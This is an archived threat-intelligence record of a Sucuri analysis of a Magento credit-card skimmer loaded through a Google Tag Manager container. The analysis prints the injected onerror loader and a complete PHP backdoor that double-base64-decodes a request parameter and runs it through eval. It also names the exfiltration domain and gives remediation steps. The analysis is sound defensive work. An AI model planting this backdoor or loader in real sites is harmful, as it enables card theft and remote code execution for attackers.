{
	"id": "d427a1c8-b906-414a-83b3-d6ce9ee79241",
	"created_at": "2026-04-06T00:06:56.440765Z",
	"updated_at": "2026-04-10T03:24:11.836384Z",
	"deleted_at": null,
	"sha1_hash": "bea3c1e9bf89592ff4a32953708cace24081c354",
	"title": "Google Tag Manager Skimmer Steals Credit Card Info From Magento Site",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2410274,
	"plain_text": "Google Tag Manager Skimmer Steals Credit Card Info From\r\nMagento Site\r\nBy Puja Srivastava\r\nPublished: 2025-02-06 · Archived: 2026-04-05 13:42:28 UTC\r\nAt Sucuri, we are committed to protecting websites from malware and other cyber threats. Recently, we were\r\ncontacted by a customer who had experienced credit card data theft from their Magento-based eCommerce\r\nwebsite. After an extensive investigation, we were able to trace the malware responsible for what was happening\r\nback to the Google Tag Manager script and assist in restoring the site’s security. We have detailed a previous\r\nsimilar infection here: Malicious Activities with Google Tag Manager.\r\nWhat was noticed?\r\nThe customer reached out to us with a concerning issue: they had discovered that sensitive customer data,\r\nspecifically credit card details, was being stolen from their Magento site. This type of breach is especially\r\ntroubling because it can lead to financial losses, loss of customer trust, and significant damage to the website’s\r\nreputation.\r\nWhat is Google Tag Manager?\r\nGoogle Tag Manager (GTM) is a free tool from Google that allows website owners to manage and deploy\r\nmarketing tags on their website without needing to modify the site’s code directly. 
It simplifies the process of\r\nadding and updating tags for things like Google Analytics, AdWords, Facebook Pixel, and more, making it easier\r\nfor marketers to track website activity and optimize campaigns without involving developers every time a change\r\nis needed.\r\n\u003cscript\u003ehttp://www.googletagmanager.com/gtm.js?id=GTM-'ID'\u003c/script\u003e\r\nThe \u003cscript\u003e tag loads the Google Tag Manager (GTM) JavaScript file, allowing you to manage and deploy\r\ntags on your website using the specified GTM container ID (GTM-ID).\r\nTracing the Source of the Malware\r\nDuring our investigation, we performed a deep dive into the website’s files, checking for any suspicious or\r\nunfamiliar code. It wasn’t long before we identified that the malware was being loaded from the database table\r\ncms_block.content.\r\n\u003cimg src=\"google-manager.png\" onerror=\"(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\r\nnew Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],\r\nj=d.createElement(s),dl=l!='dataLayer'?'\u0026l='+l:'';j.async=true;j.src=\r\nhttps://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nPage 1 of 5\n\n'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);\r\n})(window,document,'script','dataLayer','GTM-MLHK2N68');\"\u003e\r\n\u003cscript\u003e(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), i\r\nAt first glance, this code appears to be a standard Google Tag Manager (GTM) and Google Analytics tracking\r\nscript, which is often used for website analytics and advertising purposes. However, closer examination revealed\r\nthat this code was not used for legitimate tracking but was instead malicious in nature.\r\nNew Findings and Ongoing Threats\r\nIn 2024, we published an article detailing how Magecart veteran ATMZOW was found using Google Tag Manager\r\nfor delivering malware. 
This new infection indicates that the tactic is still being widely used by attackers, this time\r\nflagged by SiteCheck under the names:\r\nmalware.magento_shoplift?71.5\r\nmalware.magento_shoplift.171.51\r\nmalware.magento_shoplift.171.52\r\nDuring our investigation, we also uncovered a backdoor located in ./media/index.php. This backdoor could have\r\nbeen exploited to further infect the site, providing attackers with persistent access. Here is the backdoor code we\r\nfound:\r\nfunction get_data($param, $default) {\r\n $total = $_REQUEST;\r\n if(isset($total[$param])) {\r\n return $total[$param];\r\n } else {\r\n return $default;\r\n }\r\n}\r\nfunction get_cli() {\r\n if( strpos(hash(\"sha256\", get_data(\"item\", \"\")), \"5a2c75360f3ff123\") === false )\r\n return \"\";\r\n $param_name = \"order\";\r\n $data = get_data($param_name, \"\");\r\n $cli = base64_decode($data);\r\n $cli = base64_decode($cli);\r\n return $cli;\r\n}\r\n$cli = get_cli();\r\nreturn eval($cli);\r\nAt the time of writing this article, we found that at least 6 websites were currently infected with this particular\r\nGoogle Tag Manager ID, indicating that this threat is actively affecting multiple sites.\r\nHere’s the source code of the site where the Google Tag Manager ID is shown:\r\nDomain included\r\neurowebmonitortool[.]com is used in this malicious campaign and is currently blocklisted by 15 security vendors\r\nat VirusTotal.\r\nHow the Malware Functioned\r\nWithin the GTM tag, there was an encoded JavaScript payload that acted as a credit card skimmer. 
This script was\r\ndesigned to collect sensitive data entered by users during the checkout process and send it to a remote server\r\ncontrolled by the attackers.\r\nOnce executed, the malware would steal credit card information from the checkout pages and send it to an\r\nexternal server.\r\nMalicious GTM Content: GTM-MLHK2N68\r\nThe function _0x5cdc is an obfuscation technique. It maps index values to specific characters in the array,\r\nmaking it difficult for someone to immediately understand the purpose of the script.\r\nThe script also uses a series of mathematical operations (parseInt, shift) in a loop, further scrambling the code.\r\nThe string d2luZG93Lnd3 is Base64 encoded, which decodes to window.www . This is part of a larger encoded\r\nstring that leads to the loading of the Google Analytics script from www.google-analytics.com .\r\nThis is a trick often used by attackers to disguise the true purpose of the script.\r\nThe script injects a modified version of the Google Analytics script (analytics.js) by calling it through a\r\ndynamically created \u003cscript\u003e tag.\r\nThe function eval() is used at the end of the script to execute the decoded and manipulated payload, which likely\r\nperforms malicious actions, such as exfiltrating sensitive information.\r\nThe final payload of this script is a hidden credit card skimmer, which collects data such as credit card details\r\nentered during checkout and sends it to the attacker’s remote server.\r\nHow We Remedied the Situation\r\nOnce we identified the source of the malware, we removed the malicious code from the cms_block.content\r\ntable and any other compromised areas of the site.\r\nWe also cleaned up the obfuscated script and the backdoor to prevent the malware from being reintroduced.\r\nConclusion\r\nThis GTM-based attack demonstrates the sophistication of modern malware, 
utilizing legitimate platforms like\r\nGoogle Tag Manager to deploy malicious code. The obfuscation and encoding techniques make it particularly\r\nchallenging to detect, requiring deep investigation to uncover its true purpose.\r\nStay on the safe side and investigate any scripts you find strange or unfamiliar. Remain critical of any scripts that\r\nweren’t placed by a website administrator; they may be a sign of potential compromise. It’s critical to perform a\r\nthorough audit if you suspect your website is infected and clean up any suspicious tags or scripts to prevent further\r\ndata theft.\r\nRemediation Steps\r\nTo remediate the Google Tag Manager-based malware:\r\n1. Remove any suspicious GTM tags: log into GTM, identify them, and delete them.\r\n2. Perform a full website scan to detect any other malware or backdoors.\r\n3. Remove any malicious scripts or backdoor files.\r\n4. Ensure Magento and all extensions are up-to-date with security patches.\r\n5. Regularly monitor site traffic and GTM for any unusual activity.\r\nSource: https://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html"
	],
	"report_names": [
		"google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434016,
	"ts_updated_at": 1775791451,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bea3c1e9bf89592ff4a32953708cace24081c354.pdf",
		"text": "https://archive.orkl.eu/bea3c1e9bf89592ff4a32953708cace24081c354.txt",
		"img": "https://archive.orkl.eu/bea3c1e9bf89592ff4a32953708cace24081c354.jpg"
	}
}